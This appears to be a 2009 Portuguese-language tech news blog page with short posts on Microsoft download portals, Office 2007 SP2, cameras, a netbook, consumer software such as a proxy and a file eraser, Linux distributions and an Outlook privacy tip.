  • IE Addons: Informações e downloads sobre plugins para o navegador Internet Explorer.
  • Microsoft Developer Network: O portal do desenvolvedor. Existem conteútos de acesso público e conteúdo apenas para assinantes.
  • Microsoft Download Center: Repositório principal da Microsoft contendo atualizações, versões de produtos para avaliação e Service Packs.
  • Microsoft Office Labs: Protótipos para o Office.
  • Microsoft Research: Site de demos que podem ser baixados publicamente.
  • Microsoft Security: Portal que possui as últimas notícias e e produtos relacionados à segurança.
  • Microsoft TechNet: Recursos para profissionais de TI. Muito material técnico para download.
  • TechNet Evaluation Center: Download de softwares betas e triais.
  • Microsoft Update: Funciona apenas no Internet Explorer. Este portal verifica seu computador e realiza as últimas atualizações de segurança automaticamente.
  • Office Update: Atualizações para os produtos Office além do download de vários plugins.
  • Vista Gallery: Downloads para Windows Vista.
  • Windows Live: Portal para download e instalação dos produtos LIVE.
  • Windows Live Gallery: Gadgets, emoticons, barras de ferrametnas, imagens de visualização, winks e outros ítens LIVE.
  • WM Plugins: Codecs, skins, efeitos e ferramentas adicionais para o Windows Media Player.

Fonte: http://www.ghacks.net/

SP2 do Office 2007 será liberado no dia 28 de abril, diz Microsoft

A Microsoft afirmou que o Service Pack 2 (SP2) do Office 2007 - pacote de aplicativos para o escritório da empresa - será lançado no dia 28 deste mês. Essa é a primeira grande atualização para o popular pacote de softwares desde dezembro de 2007. Na semana passada, a companhia disse que o SP2 seria distribuído ainda em abril, mas sem especificar uma data.

Entre as novidades incluídas na atualização estão o suporte aos documentos do tipo Open Document Format (ODF), melhoras no desempenho do Outlook 2007 e o recurso de salvar um arquivo como PDF. O blog Microsoft Update lista ainda outros avanços e também informa que, assim como em outros service packs, todas as correções de segurança feitas desde 2007 estão incluídas no pacote.

A interoperabilidade com outros formatos é algo que deve ser bem recebido não só pelos usuários, mas também pelas autoridades antitruste da União Europeia, que investigam a Microsoft por abusar de sua posição dominante no segmento de aplicativos de produtividade.

DSLR Nikon D5000: 12,3 megapixels, vídeo HD 720p e tela giratória


A D5000 da Nikon é uma DSLR de 12,3 megapixels que grava vídeo HD 720p usando o sensor da D90 por 850 dólares. Ah, e sim, o display é todo giratório.

Ela possui o mesmo sensor que a D90 anterior da Nikon, que também gravava vídeo HD, então você pode esperar o mesmo desempenho de imagem e de vídeo. Na verdade, parece que boa parte do que vimos na gravação de vídeo da D90 permaneceu o mesmo, então certifique-se de ler nossa review para ter um gostinho dos prazeres (e dores) que se aplicam.

Descrever esta como uma D90 Lite também não é muito distante da verdade: ela é menor, não tão rápida e não tem o comando Speedlight, mas possui coisas de iniciantes como menus de indicação e 19 – sim, dezenove – modos de cenários, desde os suspeitos básicos como Esporte a uns mais aleatórios, como Luz de Vela. Ela possui o mesmo foco automático de 11 pontos, alcance ISO expandido 100 a 6400 e vídeo com 720p a 24fps, também como a D90.

O display de ângulo variável possui 2,7”, um pouco menor que as 3” com o qual nos acostumamos nas Nikons, mas eu suponho que este seja o preço da liberdade. A D5000 possui quatro modos de foco automático Live View, incluindo um novo FA Subject Tracking que trava em alvo móveis como gatos e pirralhos movidos a açúcar.

É interessante como a Nikon e a Canon ambas fizeram a mesma jogada na exata mesma hora: tiraram um sensor de uma câmera mediana mais cara e enfiaram em uma DSLR básica com gravação de vídeo HD. Claramente, as duas têm uma noção de direção semelhante para as DSLRs e parece que o primeiro campo de batalha de verdade será nos níveis inferiores (o que é bom pra gente, já que significa que os preços devem ficar otimamente sangrentos). Mas só pra deixar registrado, ainda estamos esperando aquela D400 com capacidade de vídeo 1080p.
Nikon USA

LaCie Rugged XL: 1 TB, US$ 160


Os discos rígidos externos Rugged, da LaCie, sempre pareceram tentadores, mas a relação preço por armazenamento nunca foi muito atraente. O novo Rugged XL pode finalmente ter encontrado o equilíbrio.

O LaCie Rugged XL oferece 1 TB de armazenamento USB/eSata, envolvido em alumínio e um grande pára-choque, por US$ 160. Mas, pelo menos de acordo com essa imagem, o novo modelo (à direita) é imeeeenso, mesmo para os padrões de 3,5 polegadas. Sério, ele pode comer o seu laptop se ficar muito perto. [LaCie]

C510, o Cyber-shot básico da Sony Ericsson, que caça rostos


Nem só de aparelhos supersofisticados vive a linha de camerafones Cyber-shot, da Sony Ericsson. Mas mesmo nos modelos mais simples, como o C510, a empresa dá uma pitada de recursos bacanas.

O fiininho, com 4,7 por 1,2 por 10,7 centímetros, que já está clicando no INFOLAB não tem a pretensão de brigar com os bonitões do mercado. Mas sua câmera de 3,2 MP é a primeira entre as que têm menos de 8 MP a vir com reconhecimento de faces.

Como na maioria das máquinas digitais, a câmera é ocultada por um protetor – você só desliza a tampa quando realmente precisar usá-la. Ela faz imagens panorâmicas e reconhece sorrisos – mas, pelo que percebemos, apenas se você estiver bem próximo da pessoa que soltou a gargalhada. Mesmo assim, as imagens saem bem bonitinhas. E, o sistema para visualizá-las é mais bonito ainda.

O menu do celular tem um design bem bacana também. Semelhante a de outros produtos multimídia da Sony Ericsson. Nele, é possível ter acesso direto às fotos, músicas, vídeos e jogos.

Apesar do jeito exterior bem basicão, o C510 vem com 3G, Wi-Fi e Bluetooth. Ele tem acesso direto ao YouTube e leitor de RSS (sim, você não vai ficar longe das últimas novidades). O preço? 799 reais.Info

Tuesday, April 14, 2009

Compartilhe a conexão web com o Proxy


Com o programa AnalogX Proxy, o internauta cria no Windows um servidor Proxy com poucos cliques no mouse.

Um servidor proxy, para quem não conhece, é um sistema que permite compartilhar uma conexão de internet para os outros computadores da rede, que não são conectados diretamente à web.

O AnalogX Proxy é bastante simples de configurar, contudo, para aqueles que já dominam as configurações básicas de rede - internautas leigos que se arriscarem com o programa terão dificuldades.

Por não ser um programa muito robusto, é indicado para o internauta que não tem um roteador (um equipamento que distribui a conexão web entre vários PCs) e precisa conectar na internet os outros computadores de casa. Empresas pequenas também podem usar o software para compartilhar a conexão de internet.

Depois de configurado, os outros computadores da rede podem acessar, via o AnalogX Proxy, páginas de internet e serviços comuns, como e-mail e mensageiros instantâneos.


Faça download clicando aqui

Monday, April 13, 2009

Elimine seus arquivos definitivamente


Freeraser. Este programa possui varios métodos de eliminação, mas básicamente se trata de escrever com informação aleatória aquelas posições de memória ocupadas pelos dados que desejamos eliminar de forma definitiva.

Faça download clicando aqui

Distribuições Linux


Este artigo é direcionado aos micreiros que ainda não tiveram qualquer contacto com o Sistema Operacional Linux.

Quando ler este artigo deverá ficar com uma noção básica do Linux o que ajuda e é sempre bem-vindo para os usuários que nunca tiveram qualquer tipo de experiência com o Linux.

O que é o Linux?
Conheça o Linux no Wikipedia

O que é uma distribuição Linux?
Saiba o que é uma distribuição através do Wikipedia .

Porque é existem tantos sistemas operativos Linux?
São sistemas Linux baseados em diferentes conjuntos de programas, cada um á medida da sua função.

Quais são as distribuições Linux disponíveis?
Conheça a lista de distribuições Linux através do Wikipedia. Uma lista mais exaustiva está disponível em LWN.net . Passe também pela DistroWatch , onde pode obter as distribuições mais populares e pode ver uma lista com curtos sumários.

Que distribuição deve usar?
A melhor maneira de saber qual a melhor distribuição para si é experimentando as que mais o chamam á atenção. Pode sempre comparar distribuições através do Wikipedia. Existe também o Linux Distribution Chooser que o pode ajudar na escolha da sua distribuição. Uma boa maneira de experimentar distribuições Linux é usando um LiveCD, que é um sistema operativo Linux que corre a partir de um CD sem necessidade de qualquer instalação. Pode encontrar uma Lista de LiveCDs através deste link http://www.frozentech.com/content/livecd.php

Nova Placa P45 da DFI


A DFI está trabalhando numa nova placa P45, que segundo dizem é mais barata e boa para a prática do overclock. Ela foi chamada de Blood Iron (BI) P45-T2RS Elite, um modelo que na verdade é uma atualização da P45-T2RS.

A noca criação da DFI conta com um slot PCIe 16x e três slots PCIe 1x para reduzir os custos. Portanto, esta placa não terá suporte Crossfire.

Segundo a DFI, a Bllod Iron deverá atingir os 600MHz de FSB facilmente, além de suportar os processadores Core 2 Duo/Quad com um FSB que chega aos 1333 MHz. Ela também apresenta quatro slots para memórias DDR2, seis portas SATA 3.0 Gbps, canais de Áudio 7.1, Ethernet Gigabit, um conector IDE e algumas características especiais no BIOS para os overclockers. A Blood Iron P45-T2RS Elite começará a ser fabricada de forma maciça na próxima semana e por isso será possível encontrá-la nas lojas brevemente.

Mantenha o sigilo no Outlook


Escolha os e-mails que vão para a caixa Itens Enviados para evitar que eles fiquem à vista de curiosos

Em comunicações sigilosas, manter uma cópia da mensagem na pasta Itens Enviados pode ser um problema. Para evitar isso, é possível usar um ajuste do Outlook, que desliga completamente a gravação de mensagens ou uma macro para escolher o que é armazenado na pasta. Confira como fazer essas duas alternativas, a seguir.

DESLIGUE A GRAVAÇÃO

Para desligar completamente a gravação, comece acessando Ferramentas> Opções. Na aba Preferências, clique no botão Opções de E-mail. Na janela que aparece, desmarque a opção Salvar Cópias de E-mails na Pasta Itens Enviados. Pressione OK duas vezes. Com isso, nenhuma mensagem será gravada na pasta indicada. É um ajuste um pouco radical, mas que pode ser necessário para algumas pessoas.

Quanto custa a banda larga mais rápida do mundo?


Se você é uma daquelas pessoas que gostaria de ter uma conexão de banda larga rápida, mas muito rápida mesmo, seguem aqui alguns dados que farão o seu coração disparar ou o seu sangue ferver, ou quem sabe ambos.

A conexão mais rápida em operação no mundo alcança a velocidade de 160 Mb por segundo e está sendo oferecida no Japão pela empresa J: Com, que é a maior empresa de cabo daquele país. O dado que causa maior espanto é o do valor que a empresa teve que investir para modernizar a sua rede e oferecer essa velocidade: incríveis US$ 20 por domicílio atendido.

O custo dessa conexão no Japão está na faixa de US$ 60, cerca de US$ 5 a mais do que a sua conexão básica de 30 Mb por segundo.

Existe um receio por parte de algumas companias de que oferecendo conexões acima de 100 Mb por segundo, estariam abrindo a “caixa de pandora”. As pessoas estariam capacitadas a fazer download de qualquer tipo de arquivo, em um espaço de tempo muito reduzido.

Sites e aplicativos da semana

SITES

Band-Flyers - Crie flyers que podem ser impressos online. Existem vários modelos para você escolher onde você pode personalizar cor, bordas, fontes, layouts e ainda enviar suas próprias imagens.

FollowFridays - Descubra as melhores indicações para se seguir no Twitter.

GoView - Ferramenta para gravação de vídeos que permite o compartilhamento de seu projeto.

IconPot - Uma enorme coleção de ícones para designer e webdesigners.

Origami - Aprenda tudo sobre Origami!

RadioBunch - Agregador de rádios online onde as rádios são ranqueadas de acordo com a opinião dos ouvintes.

APLICATIVOS

Game Booster - Utilitário que realiza várias otimizações em seu computador praparando-o para um desenpenho melhor ao executar games.

Radioshure - Aplicativo para escutar rádios online espalhadas pelo mundo todo, compatível com XP e Vista possui instalador e versão porable.

Tcp Optimizer - Otimize sua conexão TCP-IP, simples assim.



TinEye - Busca de imagens através de outras imagens

No processo de desenvolvimento de artes visuais é sempre necessário procurar novas formas de inspiração e o TinEye pode ajudar na busca de imagens com formas e desenhos semelhantes pela internet.

Você envia ou escolhe uma imagem de através de um link ou upload e a ferramenta se encarrega de encontrar outras imagens que tenham algo semelhante.

A ferramenta está disponível para o iPhone que serve para identificar imagens tiradas diretamente da câmera.

Confira um exemplos de buscas no TinEye.

Microsoft começa a distribuir IE8 pelo Windows Update

partir da próxima semana, a Microsoft vai começar a distribuir o seu mais recente navegador, o Internet Explorer 8, para os internautas que ainda estão usando versões antigas do browser, como o IE6 e o IE7. A distribuição será feita por meio do serviço Windows Update, que baixa e instala atualizações de programas e correções de segurança nas máquinas que rodam o sistema da operacional da companhia.

“A partir da próxima semana, os usuários que ainda tiverem o IE6 ou o IE7 instalado no Windows, Windows Vista, Windows Server 2003 ou Windows Server 2008 receberão uma notificação automática sobre o Internet Explorer 8”, disser Eric Hebenstreit, um gerente de programação da equipe que desenvolveu o IE8. As notificações serão feitas gradualmente, o que quer dizer que nem todos os usuários receberão as mensagens via Windows Update.

Ao contrário de outras atualizações, que podem ser instaladas automaticamente o IE8 é baixado para o PC, mas sua instalação depende da aprovação do internauta, que pode adiar a atualização do navegador e até cancelá-la. Por outro lado, aqueles que não quiserem esperar para obter a atualização podem fazer o download manual do aplicativo e fazer a instalação em suas máquinas.

De acordo com a Net Applications, empresa que mede a utilização dos diferentes navegadores na web, disse que o IE8 tem, por enquanto, apenas 3,7% de participação.

Mini 1120BR, o netbook fininho da HP

Junto com todos os ovos de páscoa remanescentes, o Mini 1120BR, primeiro minilaptop da HP com processador Atom a ser vendido no Brasil acabou de ser desempacotado aqui no INFOLAB.

De cara, suas dimensões de 26,17 por 16,6 por 2,5 centímetros nos deixaram mais animados ainda porque, além de fininho e leve (só um quilinho), ele possui um teclado decente, como o seu antecessor.

O bonitinho vem com tela de 10 polegadas, processador Intel Atom N270 de 1,60 GHz, disco rígido de 80 GB, 1 GB de memória RAM, duas portas USB 2.0, conexão Wi-Fi e Bluetooth. Info

Só o preço sugerido pelo fabricante é que não é inho: 1 999 reais.

Wikipedia

Search results

ByteNews

Bytenews